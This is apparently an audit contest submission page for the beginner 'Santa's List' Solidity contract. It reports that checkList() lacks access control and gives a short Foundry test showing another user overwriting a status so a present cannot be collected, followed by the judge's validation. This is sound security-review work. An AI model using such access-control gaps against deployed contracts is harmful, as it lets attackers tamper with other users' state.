First Flight #5: Santa's List
First Flight #5
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

checklist() function can be called by anyone

Nocturnus

Summary

According to the project contest details only Santa should be able to call checkList() function.

Vulnerability Details

There is no modifier or revert function to prevent anyone calling the checkList() function.

Impact

Anyone can call the checkList() function. This effects whole logic of the contract. Users whose status is set once or twice can be changed by anyone preventing the user to collect NFT.

Please see PoC below:

function testCheckListFunctionCanbeCalledByAnyone() public {
vm.warp(santasList.CHRISTMAS_2023_BLOCK_TIME() + 1);
vm.startPrank(santa);
santasList.checkList(user, SantasList.Status.NICE);
santasList.checkTwice(user, SantasList.Status.NICE);
vm.stopPrank;
vm.startPrank(user2);
santasList.checkList(user, SantasList.Status.NAUGHTY);
vm.stopPrank;
vm.startPrank(user);
vm.expectRevert();
santasList.collectPresent();
vm.stopPrank;
}

Tools Used

  • foundry

  • manual code review

Recommendations

onlySanta modifier should be added to checkList() function

Updates

Lead Judging Commences

inallhonesty Lead Judge almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

Access Control on checkList()

Anyone is able to call checkList() changing the status of a provided address. This is not intended functionality and is meant to be callable by only Santa.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.